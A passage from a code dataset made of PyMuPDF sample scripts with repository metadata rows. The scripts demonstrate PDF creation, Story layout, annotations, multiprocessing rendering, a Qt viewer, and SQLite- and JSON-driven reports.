text_table = ("A", "B", "C", "D")
writer = pymupdf.DocumentWriter(__file__.replace(".py", ".pdf")) # create the writer
device = writer.begin_page(MEDIABOX) # make new page
for i, text in enumerate(text_table):
story = pymupdf.Story(em=1)
body = story.body
with body.add_paragraph() as para:
para.set_bgcolor("#ecc")
para.set_pagebreak_after() # fills whole cell with bgcolor
para.set_align("center")
para.set_fontsize(16)
para.add_text(f"\n\n\n{text}")
story.place(CELLS[i])
story.draw(device)
del story
writer.end_page() # finish page
writer.close() # close output file
| 884 | Python | .py | 22 | 36.090909 | 85 | 0.668998 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,306 | multiprocess-render.py | pymupdf_PyMuPDF/docs/samples/multiprocess-render.py | """
Demonstrate the use of multiprocessing with PyMuPDF.
Depending on the number of CPUs, the document is divided in page ranges.
Each range is then worked on by one process.
The type of work would typically be text extraction or page rendering. Each
process must know where to put its results, because this processing pattern
does not include inter-process communication or data sharing.
Compared to sequential processing, speed improvements in range of 100% (ie.
twice as fast) or better can be expected.
"""
from __future__ import print_function, division
import sys
import os
import time
from multiprocessing import Pool, cpu_count
import pymupdf
# choose a version specific timer function (bytes == str in Python 2)
# NOTE: time.clock existed only through Python 3.7; it is selected here
# solely on Python 2, so the expression is safe on modern interpreters.
mytime = time.clock if str is bytes else time.perf_counter
def render_page(vector):
    """Render a page range of a document.

    Notes:
        The PyMuPDF document cannot be part of the argument, because that
        cannot be pickled. So we are being passed in just its filename.
        This is no performance issue, because we are a separate process and
        need to open the document anyway.
        Any page-specific function can be processed here - rendering is just
        an example - text extraction might be another.
        The work must however be self-contained: no inter-process communication
        or synchronization is possible with this design.
        Care must also be taken with which parameters are contained in the
        argument, because it will be passed in via pickling by the Pool class.
        So any large objects will increase the overall duration.
    Args:
        vector: a list containing required parameters.
    """
    # recreate the arguments
    idx = vector[0]  # this is the segment number we have to process
    cpu = vector[1]  # number of CPUs
    filename = vector[2]  # document filename
    mat = vector[3]  # the matrix for rendering
    doc = pymupdf.open(filename)  # open the document
    try:
        num_pages = doc.page_count  # get number of pages
        # pages per segment: make sure that cpu * seg_size >= num_pages!
        seg_size = int(num_pages / cpu + 1)
        seg_from = idx * seg_size  # our first page number
        seg_to = min(seg_from + seg_size, num_pages)  # last page number
        for i in range(seg_from, seg_to):  # work through our page segment
            page = doc[i]
            # page.get_text("rawdict")  # use any page-related type of work here, eg
            pix = page.get_pixmap(alpha=False, matrix=mat)
            # store away the result somewhere ...
            # pix.save("p-%i.png" % i)
    finally:
        doc.close()  # release the document even if rendering raised
    print("Processed page numbers %i through %i" % (seg_from, seg_to - 1))
if __name__ == "__main__":
t0 = mytime() # start a timer
filename = sys.argv[1]
mat = pymupdf.Matrix(0.2, 0.2) # the rendering matrix: scale down to 20%
cpu = cpu_count()
# make vectors of arguments for the processes
vectors = [(i, cpu, filename, mat) for i in range(cpu)]
print("Starting %i processes for '%s'." % (cpu, filename))
pool = Pool() # make pool of 'cpu_count()' processes
pool.map(render_page, vectors, 1) # start processes passing each a vector
t1 = mytime() # stop the timer
print("Total time %g seconds" % round(t1 - t0, 2))
| 3,243 | Python | .py | 65 | 44.876923 | 80 | 0.69921 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,307 | multiprocess-gui.py | pymupdf_PyMuPDF/docs/samples/multiprocess-gui.py | """
Created on 2019-05-01
@author: yinkaisheng@live.com
@copyright: 2019 yinkaisheng@live.com
@license: GNU AFFERO GPL 3.0
Demonstrate the use of multiprocessing with PyMuPDF
-----------------------------------------------------
This example shows some more advanced use of multiprocessing.
The main process show a Qt GUI and establishes a 2-way communication with
another process, which accesses a supported document.
"""
import os
import sys
import time
import multiprocessing as mp
import queue
import pymupdf
''' PyQt and PySide namespace unifier shim
https://www.pythonguis.com/faq/pyqt6-vs-pyside6/
simple "if 'PyQt6' in sys.modules:" test fails for me, so the more complex pkgutil use
overkill for most people who might have one or the other, why both?
'''
from pkgutil import iter_modules
def module_exists(module_name):
    """Return True if *module_name* is among the importable top-level modules."""
    for _finder, found_name, _is_pkg in iter_modules():
        if found_name == module_name:
            return True
    return False
if module_exists("PyQt6"):
# PyQt6
from PyQt6 import QtGui, QtWidgets, QtCore
from PyQt6.QtCore import pyqtSignal as Signal, pyqtSlot as Slot
wrapper = "PyQt6"
elif module_exists("PySide6"):
# PySide6
from PySide6 import QtGui, QtWidgets, QtCore
from PySide6.QtCore import Signal, Slot
wrapper = "PySide6"
my_timer = time.clock if str is bytes else time.perf_counter
class DocForm(QtWidgets.QWidget):
    """Main window: opens a document in a worker process and pages through it.

    Communication with the worker (``openDocInProcess``) uses two
    multiprocessing queues: ``queNum`` carries requested page numbers to the
    worker (-1 means "exit"), ``queDoc`` carries results back - first the
    page count as an int, then one tuple of pixmap data per rendered page.
    """

    def __init__(self):
        super().__init__()
        self.process = None  # worker process, created on first document open
        self.queNum = mp.Queue()  # GUI -> worker: page numbers to render
        self.queDoc = mp.Queue()  # worker -> GUI: page count, then pixmap data
        self.page_count = 0
        self.curPageNum = 0
        self.lastDir = ""  # last directory used in the file dialog
        # timer driving the "slide show": requests the next page periodically
        self.timerSend = QtCore.QTimer(self)
        self.timerSend.timeout.connect(self.onTimerSendPageNum)
        # timer polling the result queue for rendered pages
        self.timerGet = QtCore.QTimer(self)
        self.timerGet.timeout.connect(self.onTimerGetPage)
        # timer updating the "Loading ..." message while the worker opens a file
        self.timerWaiting = QtCore.QTimer(self)
        self.timerWaiting.timeout.connect(self.onTimerWaiting)
        self.initUI()

    def initUI(self):
        """Build the widget tree: a button row above the page display label."""
        vbox = QtWidgets.QVBoxLayout()
        self.setLayout(vbox)
        hbox = QtWidgets.QHBoxLayout()
        self.btnOpen = QtWidgets.QPushButton("OpenDocument", self)
        self.btnOpen.clicked.connect(self.openDoc)
        hbox.addWidget(self.btnOpen)
        self.btnPlay = QtWidgets.QPushButton("PlayDocument", self)
        self.btnPlay.clicked.connect(self.playDoc)
        hbox.addWidget(self.btnPlay)
        self.btnStop = QtWidgets.QPushButton("Stop", self)
        self.btnStop.clicked.connect(self.stopPlay)
        hbox.addWidget(self.btnStop)
        self.label = QtWidgets.QLabel("0/0", self)  # "current/total" page display
        self.label.setFont(QtGui.QFont("Verdana", 20))
        hbox.addWidget(self.label)
        vbox.addLayout(hbox)
        self.labelImg = QtWidgets.QLabel("Document", self)  # shows the page image
        sizePolicy = QtWidgets.QSizePolicy(
            QtWidgets.QSizePolicy.Policy.Preferred, QtWidgets.QSizePolicy.Policy.Expanding
        )
        self.labelImg.setSizePolicy(sizePolicy)
        vbox.addWidget(self.labelImg)
        self.setGeometry(100, 100, 400, 600)
        self.setWindowTitle("PyMuPDF Document Player")
        self.show()

    def openDoc(self):
        """Ask the user for a file, then (re)start the worker process for it."""
        path, _ = QtWidgets.QFileDialog.getOpenFileName(
            self,
            "Open Document",
            self.lastDir,
            "All Supported Files (*.pdf;*.epub;*.xps;*.oxps;*.cbz;*.fb2);;PDF Files (*.pdf);;EPUB Files (*.epub);;XPS Files (*.xps);;OpenXPS Files (*.oxps);;CBZ Files (*.cbz);;FB2 Files (*.fb2)",
            #options=QtWidgets.QFileDialog.Options(),
        )
        if path:
            self.lastDir, self.file = os.path.split(path)
            if self.process:
                self.queNum.put(-1)  # use -1 to notify the process to exit
                self.timerSend.stop()
            self.curPageNum = 0
            self.page_count = 0
            self.process = mp.Process(
                target=openDocInProcess, args=(path, self.queNum, self.queDoc)
            )
            self.process.start()
            self.timerGet.start(40)  # poll for results every 40 ms
            self.label.setText("0/0")
            self.queNum.put(0)  # request the first page right away
            self.startTime = time.perf_counter()
            self.timerWaiting.start(40)  # show progress while the file opens

    def playDoc(self):
        """Start advancing pages automatically (one request every 500 ms)."""
        self.timerSend.start(500)

    def stopPlay(self):
        """Stop the automatic page advance."""
        self.timerSend.stop()

    def onTimerSendPageNum(self):
        """Request the next page, or stop playing at the end of the document."""
        if self.curPageNum < self.page_count - 1:
            self.queNum.put(self.curPageNum + 1)
        else:
            self.timerSend.stop()

    def onTimerGetPage(self):
        """Poll the worker's result queue and update the page display."""
        try:
            ret = self.queDoc.get(False)  # non-blocking read
            if isinstance(ret, int):  # first message from the worker: page count
                self.timerWaiting.stop()
                self.page_count = ret
                self.label.setText("{}/{}".format(self.curPageNum + 1, self.page_count))
            else:  # tuple, pixmap info
                num, samples, width, height, stride, alpha = ret
                self.curPageNum = num
                self.label.setText("{}/{}".format(self.curPageNum + 1, self.page_count))
                fmt = (
                    QtGui.QImage.Format.Format_RGBA8888
                    if alpha
                    else QtGui.QImage.Format.Format_RGB888
                )
                qimg = QtGui.QImage(samples, width, height, stride, fmt)
                self.labelImg.setPixmap(QtGui.QPixmap.fromImage(qimg))
        except queue.Empty as ex:
            pass  # nothing queued yet - try again on the next timer tick

    def onTimerWaiting(self):
        """Display an elapsed-time message while the worker opens the file."""
        self.labelImg.setText(
            'Loading "{}", {:.2f}s'.format(
                self.file, time.perf_counter() - self.startTime
            )
        )

    def closeEvent(self, event):
        """Tell the worker process to exit before the window closes."""
        self.queNum.put(-1)
        event.accept()
def openDocInProcess(path, queNum, quePageInfo):
    """Worker-process loop: open *path*, then serve page-render requests.

    Protocol: first puts the page count (int) on *quePageInfo*; afterwards,
    for every non-negative page number read from *queNum*, puts a tuple of
    pixmap data. A negative page number shuts the loop down.
    """
    t_open = my_timer()
    doc = pymupdf.open(path)
    t_done = my_timer()  # timing kept for parity with the original sample
    # announce the page count first so the GUI can initialise its display
    quePageInfo.put(doc.page_count)
    # serve requests until a negative page number arrives (shutdown signal)
    while (page_no := queNum.get()) >= 0:
        pix = doc.load_page(page_no).get_pixmap()
        quePageInfo.put(
            (page_no, pix.samples, pix.width, pix.height, pix.stride, pix.alpha)
        )
    doc.close()
    print("process exit")
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
form = DocForm()
sys.exit(app.exec())
| 6,215 | Python | .py | 160 | 30.18125 | 195 | 0.620581 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,308 | annotations-ink.py | pymupdf_PyMuPDF/docs/samples/annotations-ink.py | import math
import pymupdf
#------------------------------------------------------------------------------
# preliminary stuff: create function value lists for sine and cosine
#------------------------------------------------------------------------------
full_circle = math.pi * 2  # 360 degrees expressed in radians
one_degree = full_circle / 360  # 1 degree as radians
rect = pymupdf.Rect(100, 200, 300, 300)  # plot area for both curves
origin_x = rect.x0  # x starts at the left edge
origin_y = rect.y0 + rect.height / 2.  # vertical middle of rect means y == 0
step_x = rect.width / 360  # rect width spans 360 degrees
scale_y = rect.height / 2.  # rect height spans the value range [-1, 1]


def _curve(trig):
    """Sample *trig* over 0..361 degrees, mapped into ``rect`` coordinates."""
    return [
        (x * step_x + origin_x, -trig(x * one_degree) * scale_y + origin_y)
        for x in range(362)
    ]


sin_points = _curve(math.sin)  # sine values
cos_points = _curve(math.cos)  # cosine values
# ------------------------------------------------------------------------------
# create the document with one page
# ------------------------------------------------------------------------------
doc = pymupdf.open()  # make new PDF
page = doc.new_page()  # give it a page
# ------------------------------------------------------------------------------
# add the Ink annotation, consisting of 2 curve segments
# ------------------------------------------------------------------------------
annot = page.add_ink_annot((sin_points, cos_points))
# cosmetics: thin dashed strokes, drawn in blue
annot.set_border(width=0.3, dashes=[1])
annot.set_colors(stroke=(0, 0, 1))
annot.update()  # update the appearance
page.draw_rect(rect, width=0.3)  # outline the plot area for visual verification
doc.save("a-inktest.pdf")
21,309 | filmfestival-sql.py | pymupdf_PyMuPDF/docs/samples/filmfestival-sql.py | """
This is a demo script for using PyMuPDF with its "Story" feature.
The following aspects are being covered here:
* The script produces a report of films that are stored in an SQL database
* The report format is provided as a HTML template
The SQL database contains two tables:
1. Table "films" which has the columns "title" (film title, str), "director"
(str) and "year" (year of release, int).
2. Table "actors" which has the columns "name" (actor name, str) and "title"
(the film title where the actor had been casted, str).
The script reads all content of the "films" table. For each film title it
reads all rows from table "actors" which took part in that film.
Comment 1
---------
To keep things easy and free from pesky technical detail, the relevant file
names inherit the name of this script:
- the database's filename is the script name with ".py" extension replaced
by ".db".
- the output PDF similarly has script file name with extension ".pdf".
Comment 2
---------
The SQLITE database has been created using https://sqlitebrowser.org/, a free
multi-platform tool to maintain or manipulate SQLITE databases.
"""
import os
import sqlite3
import pymupdf
# ----------------------------------------------------------------------
# HTML template for the film report
# There are four placeholders coded as "id" attributes.
# One "id" allows locating the template part itself, the other three
# indicate where database text should be inserted.
# ----------------------------------------------------------------------
festival_template = (
    "<html><head><title>Just some arbitrary text</title></head>"
    '<body><h1 style="text-align:center">Hook Norton Film Festival</h1>'
    "<ol>"
    '<li id="filmtemplate">'
    '<b id="filmtitle"></b>'
    "<dl>"
    '<dt>Director<dd id="director">'
    '<dt>Release Year<dd id="filmyear">'
    '<dt>Cast<dd id="cast">'
    "</dl>"
    "</li>"
    "</ol>"
    "</body></html"
)
# -------------------------------------------------------------------
# define database access
# -------------------------------------------------------------------
dbfilename = __file__.replace(".py", ".db")  # the SQLITE database file name
assert os.path.isfile(dbfilename), f'{dbfilename}'
database = sqlite3.connect(dbfilename)  # open database
cursor_films = database.cursor()  # cursor for selecting the films
cursor_casts = database.cursor()  # cursor for selecting actors per film
# select statement for the films - let SQL also sort it for us
select_films = """SELECT title, director, year FROM films ORDER BY title"""
# select statement for actors: the film title is supplied per query via a
# bound "?" parameter - this is quote-safe and immune to SQL injection,
# unlike building the statement with string formatting.
select_casts = """SELECT name FROM actors WHERE film = ? ORDER BY name"""
# -------------------------------------------------------------------
# define the HTML Story and fill it with database data
# -------------------------------------------------------------------
story = pymupdf.Story(festival_template)
body = story.body  # access the HTML body detail
template = body.find(None, "id", "filmtemplate")  # find the template part
# read the films from the database and put them all in one Python list
# NOTE: instead we might fetch rows one by one (advisable for large volumes)
cursor_films.execute(select_films)  # execute cursor, and ...
films = cursor_films.fetchall()  # read out what was found
for title, director, year in films:  # iterate through the films
    film = template.clone()  # clone template to report each film
    film.find(None, "id", "filmtitle").add_text(title)  # put title in templ
    film.find(None, "id", "director").add_text(director)  # put director
    film.find(None, "id", "filmyear").add_text(str(year))  # put year
    # the actors reside in their own table - find the ones for this film title
    cursor_casts.execute(select_casts, (title,))  # execute cursor, binding title
    casts = cursor_casts.fetchall()  # read actors for the film
    # each actor name appears in its own tuple, so extract it from there
    film.find(None, "id", "cast").add_text("\n".join([c[0] for c in casts]))
    body.append_child(film)
template.remove()  # remove the template
# -------------------------------------------------------------------
# generate the PDF
# -------------------------------------------------------------------
writer = pymupdf.DocumentWriter(__file__.replace(".py", ".pdf"), "compress")
mediabox = pymupdf.paper_rect("a4")  # use pages in ISO-A4 format
where = mediabox + (72, 36, -36, -72)  # leave page borders
more = 1  # end of output indicator
while more:
    dev = writer.begin_page(mediabox)  # make a new page
    more, filled = story.place(where)  # arrange content for this page
    story.draw(dev, None)  # write content to page
    writer.end_page()  # finish the page
writer.close()  # close the PDF
21,310 | new-annots.py | pymupdf_PyMuPDF/docs/samples/new-annots.py | # -*- coding: utf-8 -*-
"""
-------------------------------------------------------------------------------
Demo script showing how annotations can be added to a PDF using PyMuPDF.
It contains the following annotation types:
Caret, Text, FreeText, text markers (underline, strike-out, highlight,
squiggle), Circle, Square, Line, PolyLine, Polygon, FileAttachment, Stamp
and Redaction.
There is some effort to vary appearances by adding colors, line ends,
opacity, rotation, dashed lines, etc.
Dependencies
------------
PyMuPDF v1.17.0
-------------------------------------------------------------------------------
"""
from __future__ import print_function
import gc
import sys
import pymupdf
print(pymupdf.__doc__)
# Compare the version components numerically. The former comparison of
# string lists was lexicographic and therefore wrong: e.g. "1.2.0" compared
# greater than "1.17.0" (because "2" > "17" as strings) and was accepted.
if tuple(int(part) for part in pymupdf.VersionBind.split(".")) < (1, 17, 0):
    sys.exit("PyMuPDF v1.17.0+ is needed.")
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
# unique sample texts, searched for later to place the text-marker annotations
highlight = "this text is highlighted"
underline = "this text is underlined"
strikeout = "this text is striked out"
squiggled = "this text is zigzag-underlined"
# RGB color triples used throughout the demo
red = (1, 0, 0)
blue = (0, 0, 1)
gold = (1, 1, 0)
green = (0, 1, 0)
displ = pymupdf.Rect(0, 50, 0, 50)  # displacement: shifts a rect 50 points down
r = pymupdf.Rect(72, 72, 220, 100)  # the first annotation rectangle
t1 = u"têxt üsès Lätiñ charß,\nEUR: €, mu: µ, super scripts: ²³!"
def print_descr(annot):
    """Write the annotation's type name, in red, to the right of its rect."""
    page = annot.parent
    label = "%s annotation" % annot.type[1]
    anchor = annot.rect.br + (10, -5)  # just right of the bottom-right corner
    page.insert_text(anchor, label, color=red)
doc = pymupdf.open()  # new empty PDF
page = doc.new_page()  # with a single page
page.set_rotation(0)
# 'Caret' annotation
annot = page.add_caret_annot(r.tl)
print_descr(annot)
r = r + displ
# 'FreeText' annotation with rotated text and custom colors
annot = page.add_freetext_annot(
    r,
    t1,
    fontsize=10,
    rotate=90,
    text_color=blue,
    fill_color=gold,
    align=pymupdf.TEXT_ALIGN_CENTER,
)
annot.set_border(width=0.3, dashes=[2])
annot.update(text_color=blue, fill_color=gold)
print_descr(annot)
r = annot.rect + displ
# 'Text' (sticky note) annotation
annot = page.add_text_annot(r.tl, t1)
print_descr(annot)
# Adding text marker annotations:
# first insert a unique text, then search for it, then mark it
pos = annot.rect.tl + displ.tl
page.insert_text(
    pos,  # insertion point
    highlight,  # inserted text
    morph=(pos, pymupdf.Matrix(-5)),  # rotate around insertion point
)
rl = page.search_for(highlight, quads=True)  # need a quad b/o tilted text
annot = page.add_highlight_annot(rl[0])
print_descr(annot)
pos = annot.rect.bl  # next insertion point
page.insert_text(pos, underline, morph=(pos, pymupdf.Matrix(-10)))
rl = page.search_for(underline, quads=True)
annot = page.add_underline_annot(rl[0])
print_descr(annot)
pos = annot.rect.bl
page.insert_text(pos, strikeout, morph=(pos, pymupdf.Matrix(-15)))
rl = page.search_for(strikeout, quads=True)
annot = page.add_strikeout_annot(rl[0])
print_descr(annot)
pos = annot.rect.bl
page.insert_text(pos, squiggled, morph=(pos, pymupdf.Matrix(-20)))
rl = page.search_for(squiggled, quads=True)
annot = page.add_squiggly_annot(rl[0])
print_descr(annot)
pos = annot.rect.bl
r = pymupdf.Rect(pos, pos.x + 75, pos.y + 35) + (0, 20, 0, 20)
annot = page.add_polyline_annot([r.bl, r.tr, r.br, r.tl])  # 'PolyLine'
annot.set_border(width=0.3, dashes=[2])
annot.set_colors(stroke=blue, fill=green)
annot.set_line_ends(pymupdf.PDF_ANNOT_LE_CLOSED_ARROW, pymupdf.PDF_ANNOT_LE_R_CLOSED_ARROW)
annot.update(fill_color=(1, 1, 0))
print_descr(annot)
r += displ
annot = page.add_polygon_annot([r.bl, r.tr, r.br, r.tl])  # 'Polygon'
annot.set_border(width=0.3, dashes=[2])
annot.set_colors(stroke=blue, fill=gold)
annot.set_line_ends(pymupdf.PDF_ANNOT_LE_DIAMOND, pymupdf.PDF_ANNOT_LE_CIRCLE)
annot.update()
print_descr(annot)
r += displ
annot = page.add_line_annot(r.tr, r.bl)  # 'Line'
annot.set_border(width=0.3, dashes=[2])
annot.set_colors(stroke=blue, fill=gold)
annot.set_line_ends(pymupdf.PDF_ANNOT_LE_DIAMOND, pymupdf.PDF_ANNOT_LE_CIRCLE)
annot.update()
print_descr(annot)
r += displ
annot = page.add_rect_annot(r)  # 'Square'
annot.set_border(width=1, dashes=[1, 2])
annot.set_colors(stroke=blue, fill=gold)
annot.update(opacity=0.5)  # the only annotation here with reduced opacity
print_descr(annot)
r += displ
annot = page.add_circle_annot(r)  # 'Circle'
annot.set_border(width=0.3, dashes=[2])
annot.set_colors(stroke=blue, fill=gold)
annot.update()
print_descr(annot)
r += displ
annot = page.add_file_annot(
    r.tl, b"just anything for testing", "testdata.txt"  # 'FileAttachment'
)
print_descr(annot)  # annot.rect
r += displ
annot = page.add_stamp_annot(r, stamp=10)  # 'Stamp'
annot.set_colors(stroke=green)
annot.update()
print_descr(annot)
r += displ + (0, 0, 50, 10)
# insert some text first - it gets removed when the redaction is applied
rc = page.insert_textbox(
    r,
    "This content will be removed upon applying the redaction.",
    color=blue,
    align=pymupdf.TEXT_ALIGN_CENTER,
)
annot = page.add_redact_annot(r)
print_descr(annot)
doc.save(__file__.replace(".py", "-%i.pdf" % page.rotation), deflate=True)
| 4,798 | Python | .py | 140 | 32.385714 | 91 | 0.696622 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,311 | quickfox.py | pymupdf_PyMuPDF/docs/samples/quickfox.py | """
This is a demo script using PyMuPDF's Story class to output text as a PDF with
a two-column page layout.
The script demonstrates the following features:
* How to fill columns or table cells of complex page layouts
* How to embed images
* How to modify existing, given HTML sources for output (text indent, font size)
* How to use fonts defined in package "pymupdf-fonts"
* How to use ZIP files as Archive
--------------
The example is taken from the somewhat modified Wikipedia article
https://en.wikipedia.org/wiki/The_quick_brown_fox_jumps_over_the_lazy_dog.
--------------
"""
import io
import os
import zipfile
import pymupdf
thisdir = os.path.dirname(os.path.abspath(__file__))
myzip = zipfile.ZipFile(os.path.join(thisdir, "quickfox.zip"))
arch = pymupdf.Archive(myzip)  # the ZIP file serves as the Story's archive
if pymupdf.fitz_fontdescriptors:
    # we want to use the Ubuntu fonts for sans-serif and for monospace
    CSS = pymupdf.css_for_pymupdf_font("ubuntu", archive=arch, name="sans-serif")
    CSS = pymupdf.css_for_pymupdf_font("ubuntm", CSS=CSS, archive=arch, name="monospace")
else:
    # No pymupdf-fonts available.
    CSS = ""
docname = __file__.replace(".py", ".pdf")  # output PDF file name
HTML = myzip.read("quickfox.html").decode()
# make the Story object
story = pymupdf.Story(HTML, user_css=CSS, archive=arch)
# --------------------------------------------------------------
# modify the DOM somewhat
# --------------------------------------------------------------
body = story.body  # access HTML body
body.set_properties(font="sans-serif")  # and give it our font globally
# modify certain nodes: walk all paragraphs and restyle them
para = body.find("p", None, None)  # find relevant nodes (here: paragraphs)
while para is not None:  # find() returns None when no paragraph is left
    para.set_properties(  # method MUST be used for existing nodes
        indent=15,
        fontsize=13,
    )
    para = para.find_next("p", None, None)
# choose PDF page size
MEDIABOX = pymupdf.paper_rect("letter")
# text appears only within this subrectangle
WHERE = MEDIABOX + (36, 36, -36, -36)
# --------------------------------------------------------------
# define page layout within the WHERE rectangle
# --------------------------------------------------------------
COLS = 2  # layout: 2 cols 1 row
ROWS = 1
TABLE = pymupdf.make_table(WHERE, cols=COLS, rows=ROWS)
# fill the cells of each page in this sequence:
CELLS = [TABLE[i][j] for i in range(ROWS) for j in range(COLS)]
fileobject = io.BytesIO()  # let DocumentWriter write to memory
writer = pymupdf.DocumentWriter(fileobject)  # define the writer
more = 1
while more:  # loop until all input text has been written out
    dev = writer.begin_page(MEDIABOX)  # prepare a new output page
    for cell in CELLS:
        # content may be complete after any cell, ...
        if more:  # so check this status first
            more, _ = story.place(cell)
            story.draw(dev)
    writer.end_page()  # finish the PDF page
writer.close()  # close DocumentWriter output
# for housekeeping work re-open from memory
doc = pymupdf.open("pdf", fileobject)
doc.ez_save(docname)
21,312 | json-example.py | pymupdf_PyMuPDF/docs/samples/json-example.py | import pymupdf
import json
my_json = """
[
{
"name" : "Five-storied Pagoda",
"temple" : "Rurikō-ji",
"founded" : "middle Muromachi period, 1442",
"region" : "Yamaguchi, Yamaguchi",
"position" : "34.190181,131.472917"
},
{
"name" : "Founder's Hall",
"temple" : "Eihō-ji",
"founded" : "early Muromachi period",
"region" : "Tajimi, Gifu",
"position" : "35.346144,137.129189"
},
{
"name" : "Fudōdō",
"temple" : "Kongōbu-ji",
"founded" : "early Kamakura period",
"region" : "Kōya, Wakayama",
"position" : "34.213103,135.580397"
},
{
"name" : "Goeidō",
"temple" : "Nishi Honganji",
"founded" : "Edo period, 1636",
"region" : "Kyoto",
"position" : "34.991394,135.751689"
},
{
"name" : "Golden Hall",
"temple" : "Murō-ji",
"founded" : "early Heian period",
"region" : "Uda, Nara",
"position" : "34.536586819357986,136.0395548452301"
},
{
"name" : "Golden Hall",
"temple" : "Fudō-in",
"founded" : "late Muromachi period, 1540",
"region" : "Hiroshima",
"position" : "34.427014,132.471117"
},
{
"name" : "Golden Hall",
"temple" : "Ninna-ji",
"founded" : "Momoyama period, 1613",
"region" : "Kyoto",
"position" : "35.031078,135.713811"
},
{
"name" : "Golden Hall",
"temple" : "Mii-dera",
"founded" : "Momoyama period, 1599",
"region" : "Ōtsu, Shiga",
"position" : "35.013403,135.852861"
},
{
"name" : "Golden Hall",
"temple" : "Tōshōdai-ji",
"founded" : "Nara period, 8th century",
"region" : "Nara, Nara",
"position" : "34.675619,135.784842"
},
{
"name" : "Golden Hall",
"temple" : "Tō-ji",
"founded" : "Momoyama period, 1603",
"region" : "Kyoto",
"position" : "34.980367,135.747686"
},
{
"name" : "Golden Hall",
"temple" : "Tōdai-ji",
"founded" : "middle Edo period, 1705",
"region" : "Nara, Nara",
"position" : "34.688992,135.839822"
},
{
"name" : "Golden Hall",
"temple" : "Hōryū-ji",
"founded" : "Asuka period, by 693",
"region" : "Ikaruga, Nara",
"position" : "34.614317,135.734458"
},
{
"name" : "Golden Hall",
"temple" : "Daigo-ji",
"founded" : "late Heian period",
"region" : "Kyoto",
"position" : "34.951481,135.821747"
},
{
"name" : "Keigū-in Main Hall",
"temple" : "Kōryū-ji",
"founded" : "early Kamakura period, before 1251",
"region" : "Kyoto",
"position" : "35.015028,135.705425"
},
{
"name" : "Konpon-chūdō",
"temple" : "Enryaku-ji",
"founded" : "early Edo period, 1640",
"region" : "Ōtsu, Shiga",
"position" : "35.070456,135.840942"
},
{
"name" : "Korō",
"temple" : "Tōshōdai-ji",
"founded" : "early Kamakura period, 1240",
"region" : "Nara, Nara",
"position" : "34.675847,135.785069"
},
{
"name" : "Kōfūzō",
"temple" : "Hōryū-ji",
"founded" : "early Heian period",
"region" : "Ikaruga, Nara",
"position" : "34.614439,135.735428"
},
{
"name" : "Large Lecture Hall",
"temple" : "Hōryū-ji",
"founded" : "middle Heian period, 990",
"region" : "Ikaruga, Nara",
"position" : "34.614783,135.734175"
},
{
"name" : "Lecture Hall",
"temple" : "Zuiryū-ji",
"founded" : "early Edo period, 1655",
"region" : "Takaoka, Toyama",
"position" : "36.735689,137.010019"
},
{
"name" : "Lecture Hall",
"temple" : "Tōshōdai-ji",
"founded" : "Nara period, 763",
"region" : "Nara, Nara",
"position" : "34.675933,135.784842"
},
{
"name" : "Lotus Flower Gate",
"temple" : "Tō-ji",
"founded" : "early Kamakura period",
"region" : "Kyoto",
"position" : "34.980678,135.746314"
},
{
"name" : "Main Hall",
"temple" : "Akishinodera",
"founded" : "early Kamakura period",
"region" : "Nara, Nara",
"position" : "34.703769,135.776189"
}
]
"""
# the result is a Python dictionary:
my_dict = json.loads(my_json)
MEDIABOX = pymupdf.paper_rect("letter")  # output page format: Letter
WHERE = MEDIABOX + (36, 36, -36, -36)  # keep a 36 pt margin on all sides
writer = pymupdf.DocumentWriter("json-example.pdf")  # create the writer
story = pymupdf.Story()
body = story.body
# build one paragraph per attribute of every JSON entry
for i, entry in enumerate(my_dict):
    for attribute, value in entry.items():
        para = body.add_paragraph()
        if attribute == "position":
            # coordinates become a clickable Google-Maps link
            para.set_fontsize(10)
            para.add_link(f"www.google.com/maps/@{value},14z")
        else:
            # attribute name: bold, dark red, smaller ...
            para.add_span()
            para.set_color("#990000")
            para.set_fontsize(14)
            para.set_bold()
            para.add_text(f"{attribute} ")
            # ... followed by the value in larger, plain text
            para.add_span()
            para.set_fontsize(18)
            para.add_text(f"{value}")
    body.add_horizontal_line()  # visual separator between entries
# This while condition will check a value from the Story `place` method
# for whether all content for the story has been written (0), otherwise
# more content is waiting to be written (1)
more = 1
while more:
    device = writer.begin_page(MEDIABOX)  # make new page
    more, _ = story.place(WHERE)
    story.draw(device)
    writer.end_page()  # finish page
writer.close()  # close output file
del story
21,313 | story-write-stabilized-links.py | pymupdf_PyMuPDF/docs/samples/story-write-stabilized-links.py | """
Demo script for PyMuPDF's `pymupdf.Story.write_stabilized_with_links()`.
`pymupdf.Story.write_stabilized_with_links()` is similar to
`pymupdf.Story.write_stabilized()` except that it creates a PDF `pymupdf.Document`
that contains PDF links generated from all internal links in the original html.
"""
import textwrap
import pymupdf
def rectfn(rect_num, filled):
    '''
    Layout callback: every page gets the same fixed geometry, so both
    arguments are ignored. Returns the page mediabox, the rectangle to be
    filled on that page, and None as the third tuple element.
    '''
    page_box = pymupdf.Rect(0, 0, 300, 400)
    content_box = pymupdf.Rect(10, 20, 290, 380)
    return page_box, content_box, None
def contentfn(positions):
    '''
    Returns html content, with a table of contents derived from `positions`.

    Args:
        positions: position records from a previous layout pass; each is
            expected to provide heading, open_close, text, id, page_num,
            depth, href and rect attributes. Headings among them become
            TOC entries, linked via their "id" when one is present.

    Side effect: writes the generated HTML next to this script (same name,
    ".html" extension) for inspection.
    '''
    ret = ''
    ret += textwrap.dedent('''
        <!DOCTYPE html>
        <body>
        <h2>Contents</h2>
        <ul>
        ''')
    # Create table of contents with links to all <h1..6> sections in the
    # document. Only "open" records (bit 0 of open_close) are used, so each
    # heading is listed exactly once.
    for position in positions:
        if position.heading and (position.open_close & 1):
            text = position.text if position.text else ''
            if position.id:
                ret += f"    <li><a href=\"#{position.id}\">{text}</a>\n"
            else:
                ret += f"    <li>{text}\n"
            ret += f"    <ul>\n"
